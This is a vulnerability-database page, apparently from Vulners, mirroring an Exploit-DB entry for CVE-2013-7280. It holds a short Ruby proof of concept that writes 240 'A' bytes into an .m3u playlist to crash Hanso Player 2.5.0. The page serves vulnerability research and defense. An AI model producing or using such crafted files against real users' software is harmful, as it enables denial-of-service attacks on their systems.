Lucene search
+L

Hanso Player 2.5.0 - 'm3u' Buffer Overflow (Denial of Service)

🗓️ 05 Nov 2013 00:00:00Reported by Necmettin COSKUNType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 17 Views

Hanso Player 2.5.0 Buffer Overflow denial of service in 'm3u' fil

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-7280
1 Mar 201300:00
circl
cve
CVE
CVE-2013-7280
8 Jan 201415:00
cve
cvelist
Cvelist
CVE-2013-7280
8 Jan 201415:00
cvelist
exploitdb
Exploit DB
Hanso Player 2.1.0 - '.m3u' Buffer Overflow
1 Mar 201300:00
exploitdb
nvd
NVD
CVE-2013-7280
8 Jan 201415:30
nvd
prion
Prion
Buffer overflow
8 Jan 201415:30
prion
#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Player 2.5.0 Buffer Overflow
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-player-setup.exe
# version: 2.5.0
# Tested on: windows XP sp2

DENEME = "\x41" * 240

File.open('hanzo.m3u', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Apr 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 24.3
EPSS0.0577
17